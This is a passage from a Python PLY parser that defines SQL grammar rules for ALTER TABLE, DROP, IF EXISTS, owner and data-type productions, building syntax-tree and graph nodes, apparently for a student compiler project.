graph_ref)\n\n\ndef p_stm_alter1(t):\n '''stm_alter : ALTER TABLE ID ADD COLUMN ID type nullable_opt\n | ALTER TABLE ID ADD CHECK PARA logicExpression PARC\n | ALTER TABLE ID ALTER COLUMN ID TYPE type param_int_opt\n'''\n token_alter = t.slice[6]\n if token_alter.type == \"ID\" and t[7] != 'TYPE':\n childsProduction = addNotNoneChild(t, [7])\n graph_ref = graph_node(str(\"stm_alter\"), [t[1], t[2], t[3], t[4], t[5], t[6], t[7], t[8]], childsProduction)\n addCad(\"**\\** ::= tAlter tTable tIdentifier tAdd tColumn tIdentifier \\ \\ \")\n t[0] = AlterTableAddColumn(t[3], t[6], t[7], t[7].max_size, t[8], token_alter.lineno, token_alter.lexpos,\n graph_ref)\n elif token_alter.type == \"PARA\":\n childsProduction = addNotNoneChild(t, [7])\n graph_ref = graph_node(str(\"stm_alter\"), [t[1], t[2], t[3], t[4], t[5], t[6], t[7], t[8]], childsProduction)\n addCad(\"**\\** ::= tAlter 
tTable tIdentifier tAdd tCheck '(' \\ ')' \")\n t[0] = upNodo(\"token\", 0, 0, graph_ref)\n ##### \n elif token_alter.type == \"ID\":\n childsProduction = addNotNoneChild(t, [8])\n graph_ref = graph_node(str(\"stm_alter\"), [t[1], t[2], t[3], t[4], t[5], t[6], t[7], t[8]], childsProduction)\n addCad(\"**\\** ::= tAlter tTable tIdentifier tAlter tColumn tType \\ \\ \")\n t[0] = AlterTableChangeColumnType(t[3], t[6], t[8], t[8].max_size, token_alter.lineno, token_alter.lexpos,\n graph_ref)\n\n\ndef p_stm_alter2(t):\n '''stm_alter : ALTER TABLE ID RENAME COLUMN ID TO ID\n | ALTER TABLE ID ALTER COLUMN ID SET NULL\n | ALTER TABLE ID ALTER COLUMN ID SET NOT NULL \n | ALTER TABLE ID ADD CONSTRAINT ID UNIQUE PARA ID PARC\n | ALTER TABLE ID ADD FOREIGN KEY PARA ID PARC REFERENCES ID \n'''\n token_alter = t.slice[1]\n if len(t) == 9 and t[4].upper() == 'RENAME':\n graph_ref = graph_node(str(\"stm_alter\"), [t[1], t[2], t[3], t[4], t[5], t[6], t[7], t[8]], [])\n addCad(\"**\\** ::= tAlter tTable tIdentifier tRename tColumn tIdentifier tTo tIdentifier \")\n t[0] = AlterTableRenameColumn(t[3], t[6], t[8], token_alter.lineno, token_alter.lexpos, graph_ref)\n elif len(t) == 9 and t[4].upper() == 'ALTER':\n graph_ref = graph_node(str(\"stm_alter\"), [t[1], t[2], t[3], t[4], t[5], t[6], t[7], t[8]], [])\n addCad(\"**\\** ::= tAlter tTable tIdentifier tAlter tColumn tIdentifier tSet tNull \")\n t[0] = AlterTableNotNull(t[3], t[6], True, token_alter.lineno, token_alter.lexpos, graph_ref)\n elif len(t) == 10:\n graph_ref = graph_node(str(\"stm_alter\"), [t[1], t[2], t[3], t[4], t[5], t[6], t[7], t[8], t[9]], [])\n addCad(\"**\\** ::= tAlter tTable tIdentifier tAlter tColumn tIdentifier tSet tNot tNull \")\n t[0] = AlterTableNotNull(t[3], t[6], False, token_alter.lineno, token_alter.lexpos, graph_ref)\n elif len(t) == 11:\n graph_ref = graph_node(str(\"stm_alter\"), [t[1], t[2], t[3], t[4], t[5], t[6], t[7], t[8], t[9], t[10]], [])\n addCad(\n \"**\\** ::= tAlter tTable tIdentifier tAdd tConstraint tIdentifier tUnique '(' tIdentifier ')' \")\n t[0] = upNodo(\"token\", 0, 0, graph_ref)\n elif len(t) == 12:\n graph_ref = graph_node(str(\"stm_alter\"), [t[1], t[2], t[3], t[4], t[5], t[6], t[7], t[8], t[9], t[10], t[11]],\n [])\n addCad(\n \"**\\** ::= tAlter tTable tIdentifier tAdd tForeign tKey '(' tIdentifier ')' tReference tIdentifier \")\n t[0] = upNodo(\"token\", 0, 0, graph_ref)\n\n\ndef p_param_int_opt(t):\n '''param_int_opt : PARA ENTERO PARC\n | empty'''\n if len(t) == 4:\n graph_ref = graph_node(str(t[1] + \" \" + t[2] + \" \" + t[3]))\n addCad(\"**\\** ::= '(' tEntero ')' \")\n t[0] = upNodo(\"token\", 0, 0, graph_ref)\n ##### \n else:\n t[0] = None\n\n\ndef p_db_owner(t):\n ''' db_owner : ID\n | CURRENT_USER\n | SESSION_USER'''\n token_owner = t.slice[1]\n if token_owner.type == \"ID\":\n graph_ref = graph_node(str(t[1]))\n addCad(\"**\\** ::= tIdentifier \")\n t[0] = Identifier(t[1], token_owner.lineno, token_owner.lexpos, graph_ref)\n elif token_owner.type == \"CURRENT_USER\":\n graph_ref = graph_node(str(t[1]))\n addCad(\"**\\** ::= tCurrentUser \")\n t[0] = Identifier(token_owner.value, token_owner.lineno, token_owner.lexpos, graph_ref)\n elif token_owner.type == \"SESSION_USER\":\n graph_ref = graph_node(str(t[1]))\n addCad(\"**\\** ::= tSessionUser \")\n t[0] = Identifier(token_owner.value, token_owner.lineno, token_owner.lexpos, graph_ref)\n\n\ndef p_stm_drop(t):\n '''stm_drop : DROP DATABASE if_exists_opt ID\n | DROP TABLE ID'''\n token = t.slice[1]\n if len(t) == 5:\n tokenID = t.slice[4]\n 
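# DROP DATABASE [IF EXISTS] branch: t[3] carries the optional if_exists_opt marker (None when absent) and t.slice[4] the database identifier passed to DropDatabase.\n 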
childsProduction = addNotNoneChild(t, [3])\n graph_ref = graph_node(str(\"stm_drop\"), [t[1], t[2], t[3], t[4]], childsProduction)\n addCad(\"**\\** ::= tDrop tDatabase \\ tIdentifier\")\n name_db = Identifier(tokenID.value, tokenID.lineno, tokenID.lexpos, None)\n t[0] = DropDatabase(name_db, (True if t[3] else False), token.lineno, token.lexpos, graph_ref)\n ##### \n else:\n tokenID = t.slice[3]\n graph_ref = graph_node(str(\"stm_drop\"), [t[1], t[2], t[3]], [])\n addCad(\"**\\** ::= tDrop tTable tIdentifier \")\n name_db = Identifier(tokenID.value, tokenID.lineno, tokenID.lexpos, None)\n t[0] = DropTable(name_db, token.lineno, token.lexpos, graph_ref)\n ##### \n\n\ndef p_if_exist_opt(t):\n '''if_exists_opt : IF EXISTS\n | empty'''\n if len(t) == 3:\n graph_ref = graph_node(str(str(t[1]) + \" \" + str(t[2])))\n addCad(\"**\\** ::= tIf tExists \")\n t[0] = upNodo(\"token\", 0, 0, graph_ref)\n ##### \n else:\n t[0] = None\n\n #############################\n\n\ndef p_type(t):\n ''' type : SMALLINT\n | INTEGER \n | BIGINT\n | DECIMAL PARA ENTERO COMA ENTERO PARC\n | NUMERIC PARA ENTERO COMA ENTERO PARC\n | REAL PARA ENTERO COMA ENTERO PARC\n | DOUBLE PRECISION PARA ENTERO COMA ENTERO PARC\n | MONEY\n | CARACTER VARYING\n | VARCHAR PARA ENTERO PARC\n | CHARACTER\n | CHAR PARA ENTERO PARC\n | TEXT\n | TIMESTAMP\n | DATE\n | TIME\n | INTERVAL\n | BOOLEAN\n | ID\n | VARCHAR\n | NUMERIC \n | REAL\n | DECIMAL'''\n token = t.slice[1]\n\n if token.type == \"DOUBLE\":\n graph_ref = graph_node(str(str(t[1]) + \" \" + str(t[2])))\n addCad(\"**\\** ::= DOUBLE PRECISION \")\n t[0] = TypeDef(token.type, None, None, token.lineno, token.lexpos)\n\n elif (token.type == \"CARACTER\" or token.type == \"CHAR\") and len(t) == 3:\n graph_ref = graph_node(str(str(t[1]) + \" \" + str(t[2])))\n addCad(\"**\\** ::= CARACTER VARYING\")\n t[0] = TypeDef(token.type, 0, t[3], token.lineno, token.lexpos, graph_ref)\n\n elif token.type == \"ID\":\n graph_ref = graph_node(str(t[1]))\n addCad(\"**\\** ::= \" + str(token.value).upper())\n t[0] = TypeDef(str(token.value).upper(), None, None, token.lineno, token.lexpos, graph_ref)\n\n elif len(t) > 4:\n if token.type == \"DECIMAL\":\n graph_ref = graph_node(str(str(t[1]) + \"(\" + str(t[3])+ \",\" + str(t[5])+ \")\" ))\n addCad(\"**\\** ::= tDecimal '(' tEntero ',' tEntero ')'\")\n t[0] = TypeDef(token.type, t[3], t[5], token.lineno, token.lexpos, graph_ref)\n elif token.type == \"NUMERIC\":\n graph_ref = graph_node(str(str(t[1]) + \"(\" + str(t[3])+ \",\" + str(t[5])+ \")\" ))\n t[0] = TypeDef(token.type, t[3], t[5], token.lineno, token.lexpos, graph_ref)\n elif token.type == \"REAL\":\n graph_ref = graph_node(str(str(t[1]) + \"(\" + str(t[3])+ \",\" + str(t[5])+ \")\" ))\n addCad(\"**\\** ::= tReal '(' tEntero ',' tEntero ')'\")\n t[0] = TypeDef(token.type, t[3], t[5], token.lineno, token.lexpos, graph_ref)\n elif token.type == \"DOUBLE\":\n graph_ref = graph_node(str(str(t[1]) + \"(\" + str(t[3])+ \",\" + str(t[5])+ \")\" ))\n addCad(\"**\\** ::= tDouble '(' tEntero ',' tEntero ')'\")\n t[0] = TypeDef(token.type, t[3], t[5], token.lineno, token.lexpos, graph_ref)\n elif token.type == \"VARCHAR\" or token.type == \"CHAR\":\n graph_ref = graph_node(str(str(t[1]) + \"(\" + str(t[3])+ \")\" ))\n addCad(\"**\\** ::= tDouble '(' tEntero ',' tEntero ')'\")\n t[0] = TypeDef(token.type, 0, t[3], token.lineno, token.lexpos, graph_ref)\n\n else:\n graph_ref = graph_node(str(t[1]))\n addCad(\"**\\** ::= \" + str(token.type))\n t[0] = TypeDef(token.type, None, None, token.lineno, 
token.lexpos, graph_ref)\n\n\n######################\n\ndef p_time(t):\n ''' time : YEAR\n | MONTH\n | DAY\n | HOUR\n | MINUTE\n | SECOND'''\n graph_ref = graph_node(str(t[1]))\n addCad(\"**\\